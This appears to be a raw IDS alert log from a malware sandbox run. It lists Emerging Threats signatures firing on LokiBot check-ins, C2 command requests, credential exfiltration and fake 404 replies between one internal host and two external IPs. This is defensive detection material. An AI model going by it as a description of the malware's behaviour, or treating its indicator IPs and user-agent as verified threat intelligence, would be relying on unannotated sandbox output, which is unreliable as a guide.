                  192.168.2.3188.114.96.349744802024313 08/11/22-06:42:15.052087TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349743802021641 08/11/22-06:42:14.045456TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349889802825766 08/11/22-06:44:01.764745TCP2825766ETPRO TROJAN LokiBot Checkin M24988980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349796802021641 08/11/22-06:43:04.193279TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349838802021641 08/11/22-06:43:24.421881TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349830802024318 08/11/22-06:43:16.837786TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349853802024313 08/11/22-06:43:40.660156TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349898802825766 08/11/22-06:44:09.907279TCP2825766ETPRO TROJAN LokiBot Checkin M24989880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349850802021641 08/11/22-06:43:33.879385TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349859802024313 08/11/22-06:43:42.759258TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985980192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349788802024318 08/11/22-06:42:54.331478TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978880192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349790802021641 08/11/22-06:42:56.651534TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349832802825766 08/11/22-06:43:19.747801TCP2825766ETPRO TROJAN LokiBot Checkin M24983280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349859802024318 08/11/22-06:43:42.759258TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349830802024313 08/11/22-06:43:16.837786TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349743802825766 08/11/22-06:42:14.045456TCP2825766ETPRO TROJAN LokiBot Checkin M24974380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349785802025381 08/11/22-06:42:51.879415TCP2025381ET TROJAN LokiBot Checkin4978580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349758802021641 08/11/22-06:42:30.656105TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.3188.114.97.3
                  188.114.97.3192.168.2.380497972025483 08/11/22-06:43:05.476572TCP2025483ET TROJAN LokiBot Fake 404 Response8049797188.114.97.3192.168.2.3
                  192.168.2.3188.114.97.349750802025381 08/11/22-06:42:21.832277TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349764802825766 08/11/22-06:42:41.209817TCP2825766ETPRO TROJAN LokiBot Checkin M24976480192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349888802825766 08/11/22-06:44:00.133246TCP2825766ETPRO TROJAN LokiBot Checkin M24988880192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349850802825766 08/11/22-06:43:33.879385TCP2825766ETPRO TROJAN LokiBot Checkin M24985080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349890802024313 08/11/22-06:44:03.457387TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349761802825766 08/11/22-06:42:34.002289TCP2825766ETPRO TROJAN LokiBot Checkin M24976180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349892802025381 08/11/22-06:44:04.916628TCP2025381ET TROJAN LokiBot Checkin4989280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349789802024318 08/11/22-06:42:55.412963TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978980192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349887802021641 08/11/22-06:43:58.405291TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988780192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349889802021641 08/11/22-06:44:01.764745TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349759802021641 08/11/22-06:42:31.695874TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349838802825766 08/11/22-06:43:24.421881TCP2825766ETPRO TROJAN LokiBot Checkin M24983880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349890802024318 08/11/22-06:44:03.457387TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349748802024313 08/11/22-06:42:19.613257TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349745802024313 08/11/22-06:42:16.160936TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349742802024317 08/11/22-06:42:12.661275TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24974280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349823802025381 08/11/22-06:43:13.321407TCP2025381ET TROJAN LokiBot Checkin4982380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349895802021641 08/11/22-06:44:06.157277TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349896802025381 08/11/22-06:44:07.789189TCP2025381ET TROJAN LokiBot Checkin4989680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349754802024313 08/11/22-06:42:26.308314TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975480192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349843802024313 08/11/22-06:43:31.924022TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349748802024318 08/11/22-06:42:19.613257TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974880192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349792802021641 08/11/22-06:42:59.404301TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349887802024318 08/11/22-06:43:58.405291TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988780192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349884802021641 08/11/22-06:43:54.330408TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988480192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349885802025381 08/11/22-06:43:55.376397TCP2025381ET TROJAN LokiBot Checkin4988580192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349760802825766 08/11/22-06:42:32.923604TCP2825766ETPRO TROJAN LokiBot Checkin M24976080192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349774802825766 08/11/22-06:42:44.099150TCP2825766ETPRO TROJAN LokiBot Checkin M24977480192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349800802021641 08/11/22-06:43:08.046752TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349879802025381 08/11/22-06:43:48.403290TCP2025381ET TROJAN LokiBot Checkin4987980192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349817802025381 08/11/22-06:43:11.901228TCP2025381ET TROJAN LokiBot Checkin4981780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349780802825766 08/11/22-06:42:49.154690TCP2825766ETPRO TROJAN LokiBot Checkin M24978080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349759802825766 08/11/22-06:42:31.695874TCP2825766ETPRO TROJAN LokiBot Checkin M24975980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349761802021641 08/11/22-06:42:34.002289TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349788802024313 08/11/22-06:42:54.331478TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978880192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349747802025381 08/11/22-06:42:18.537201TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349791802024313 08/11/22-06:42:58.117986TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349882802021641 08/11/22-06:43:51.663595TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988280192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349897802825766 08/11/22-06:44:08.828123TCP2825766ETPRO TROJAN LokiBot Checkin M24989780192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349800802825766 08/11/22-06:43:08.046752TCP2825766ETPRO TROJAN LokiBot Checkin M24980080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349853802024318 08/11/22-06:43:40.660156TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349793802021641 08/11/22-06:43:00.645450TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349744802024318 08/11/22-06:42:15.052087TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974480192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349791802024318 08/11/22-06:42:58.117986TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979180192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349794802025381 08/11/22-06:43:01.964847TCP2025381ET TROJAN LokiBot Checkin4979480192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349881802024318 08/11/22-06:43:50.015660TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349793802825766 08/11/22-06:43:00.645450TCP2825766ETPRO TROJAN LokiBot Checkin M24979380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349828802024313 08/11/22-06:43:14.503252TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349882802825766 08/11/22-06:43:51.663595TCP2825766ETPRO TROJAN LokiBot Checkin M24988280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349881802024313 08/11/22-06:43:50.015660TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349883802025381 08/11/22-06:43:53.308240TCP2025381ET TROJAN LokiBot Checkin4988380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349746802825766 08/11/22-06:42:17.452589TCP2825766ETPRO TROJAN LokiBot Checkin M24974680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349780802021641 08/11/22-06:42:49.154690TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349751802024318 08/11/22-06:42:22.964431TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349753802025381 08/11/22-06:42:25.207102TCP2025381ET TROJAN LokiBot Checkin4975380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349828802024318 08/11/22-06:43:14.503252TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349840802024318 08/11/22-06:43:28.505356TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349745802024318 08/11/22-06:42:16.160936TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349751802024313 08/11/22-06:42:22.964431TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349786802024318 08/11/22-06:42:53.219319TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349840802024313 08/11/22-06:43:28.505356TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349875802024318 08/11/22-06:43:47.334573TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349898802021641 08/11/22-06:44:09.907279TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349774802021641 08/11/22-06:42:44.099150TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349879802024313 08/11/22-06:43:48.403290TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987980192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349763802025381 08/11/22-06:42:39.324991TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349875802024313 08/11/22-06:43:47.334573TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349811802021641 08/11/22-06:43:10.662100TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349780802024313 08/11/22-06:42:49.154690TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349879802024318 08/11/22-06:43:48.403290TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987980192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349752802025381 08/11/22-06:42:24.044623TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349789802021641 08/11/22-06:42:55.412963TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349780802024318 08/11/22-06:42:49.154690TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349762802024313 08/11/22-06:42:35.961537TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349762802024318 08/11/22-06:42:35.961537TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976280192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349777802825766 08/11/22-06:42:45.276948TCP2825766ETPRO TROJAN LokiBot Checkin M24977780192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349745802025381 08/11/22-06:42:16.160936TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349843802025381 08/11/22-06:43:31.924022TCP2025381ET TROJAN LokiBot Checkin4984380192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349749802825766 08/11/22-06:42:20.745320TCP2825766ETPRO TROJAN LokiBot Checkin M24974980192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349832802024313 08/11/22-06:43:19.747801TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349745802825766 08/11/22-06:42:16.160936TCP2825766ETPRO TROJAN LokiBot Checkin M24974580192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349897802024313 08/11/22-06:44:08.828123TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989780192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349749802025381 08/11/22-06:42:20.745320TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349778802025381 08/11/22-06:42:46.945645TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349843802825766 08/11/22-06:43:31.924022TCP2825766ETPRO TROJAN LokiBot Checkin M24984380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349746802021641 08/11/22-06:42:17.452589TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349752802825766 08/11/22-06:42:24.044623TCP2825766ETPRO TROJAN LokiBot Checkin M24975280192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349756802024313 08/11/22-06:42:28.447484TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.3188.114.96.3
                  188.114.96.3192.168.2.380497882025483 08/11/22-06:42:54.430865TCP2025483ET TROJAN LokiBot Fake 404 Response8049788188.114.96.3192.168.2.3
                  192.168.2.3188.114.97.349800802025381 08/11/22-06:43:08.046752TCP2025381ET TROJAN LokiBot Checkin4980080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349850802024318 08/11/22-06:43:33.879385TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349790802024313 08/11/22-06:42:56.651534TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349850802024313 08/11/22-06:43:33.879385TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349777802025381 08/11/22-06:42:45.276948TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349796802025381 08/11/22-06:43:04.193279TCP2025381ET TROJAN LokiBot Checkin4979680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349867802024318 08/11/22-06:43:45.824252TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349790802024318 08/11/22-06:42:56.651534TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349859802021641 08/11/22-06:43:42.759258TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349896802825766 08/11/22-06:44:07.789189TCP2825766ETPRO TROJAN LokiBot Checkin M24989680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349832802024318 08/11/22-06:43:19.747801TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349795802024318 08/11/22-06:43:03.020333TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349890802021641 08/11/22-06:44:03.457387TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349760802025381 08/11/22-06:42:32.923604TCP2025381ET TROJAN LokiBot Checkin4976080192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349795802024313 08/11/22-06:43:03.020333TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349887802024313 08/11/22-06:43:58.405291TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988780192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349759802024318 08/11/22-06:42:31.695874TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349754802024318 08/11/22-06:42:26.308314TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975480192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349778802825766 08/11/22-06:42:46.945645TCP2825766ETPRO TROJAN LokiBot Checkin M24977880192.168.2.3188.114.97.3
                  188.114.96.3192.168.2.380498852025483 08/11/22-06:43:55.477446TCP2025483ET TROJAN LokiBot Fake 404 Response8049885188.114.96.3192.168.2.3
                  192.168.2.3188.114.97.349796802825766 08/11/22-06:43:04.193279TCP2825766ETPRO TROJAN LokiBot Checkin M24979680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349742802024312 08/11/22-06:42:12.661275TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349759802024313 08/11/22-06:42:31.695874TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349898802024318 08/11/22-06:44:09.907279TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349748802021641 08/11/22-06:42:19.613257TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349895802024318 08/11/22-06:44:06.157277TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349747802825766 08/11/22-06:42:18.537201TCP2825766ETPRO TROJAN LokiBot Checkin M24974780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349798802025381 08/11/22-06:43:06.576803TCP2025381ET TROJAN LokiBot Checkin4979880192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349888802025381 08/11/22-06:44:00.133246TCP2025381ET TROJAN LokiBot Checkin4988880192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349792802024318 08/11/22-06:42:59.404301TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979280192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349797802021641 08/11/22-06:43:05.379365TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349895802024313 08/11/22-06:44:06.157277TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349754802021641 08/11/22-06:42:26.308314TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975480192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349852802024313 08/11/22-06:43:38.361573TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349785802024318 08/11/22-06:42:51.879415TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349794802021641 08/11/22-06:43:01.964847TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349884802024318 08/11/22-06:43:54.330408TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988480192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349755802021641 08/11/22-06:42:27.395952TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349892802021641 08/11/22-06:44:04.916628TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989280192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349792802024313 08/11/22-06:42:59.404301TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349753802825766 08/11/22-06:42:25.207102TCP2825766ETPRO TROJAN LokiBot Checkin M24975380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349757802024313 08/11/22-06:42:29.610436TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349785802024313 08/11/22-06:42:51.879415TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349782802024313 08/11/22-06:42:50.570997TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349805802025381 08/11/22-06:43:09.287221TCP2025381ET TROJAN LokiBot Checkin4980580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349867802021641 08/11/22-06:43:45.824252TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349786802825766 08/11/22-06:42:53.219319TCP2825766ETPRO TROJAN LokiBot Checkin M24978680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349782802024318 08/11/22-06:42:50.570997TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978280192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349788802021641 08/11/22-06:42:54.331478TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349743802025381 08/11/22-06:42:14.045456TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349881802825766 08/11/22-06:43:50.015660TCP2825766ETPRO TROJAN LokiBot Checkin M24988180192.168.2.3188.114.97.3
                  188.114.97.3192.168.2.380497852025483 08/11/22-06:42:51.983930TCP2025483ET TROJAN LokiBot Fake 404 Response8049785188.114.97.3192.168.2.3
                  192.168.2.3188.114.96.349756802024318 08/11/22-06:42:28.447484TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975680192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349793802024313 08/11/22-06:43:00.645450TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349744802825766 08/11/22-06:42:15.052087TCP2825766ETPRO TROJAN LokiBot Checkin M24974480192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349746802024318 08/11/22-06:42:17.452589TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974680192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349791802021641 08/11/22-06:42:58.117986TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349793802024318 08/11/22-06:43:00.645450TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349885802825766 08/11/22-06:43:55.376397TCP2825766ETPRO TROJAN LokiBot Checkin M24988580192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349823802825766 08/11/22-06:43:13.321407TCP2825766ETPRO TROJAN LokiBot Checkin M24982380192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349897802024318 08/11/22-06:44:08.828123TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989780192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349830802025381 08/11/22-06:43:16.837786TCP2025381ET TROJAN LokiBot Checkin4983080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349853802825766 08/11/22-06:43:40.660156TCP2825766ETPRO TROJAN LokiBot Checkin M24985380192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349884802024313 08/11/22-06:43:54.330408TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988480192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349852802024318 08/11/22-06:43:38.361573TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349757802024318 08/11/22-06:42:29.610436TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349817802825766 08/11/22-06:43:11.901228TCP2825766ETPRO TROJAN LokiBot Checkin M24981780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349758802825766 08/11/22-06:42:30.656105TCP2825766ETPRO TROJAN LokiBot Checkin M24975880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349889802025381 08/11/22-06:44:01.764745TCP2025381ET TROJAN LokiBot Checkin4988980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349828802021641 08/11/22-06:43:14.503252TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349751802021641 08/11/22-06:42:22.964431TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349786802021641 08/11/22-06:42:53.219319TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349811802024318 08/11/22-06:43:10.662100TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349898802024313 08/11/22-06:44:09.907279TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989880192.168.2.3188.114.97.3
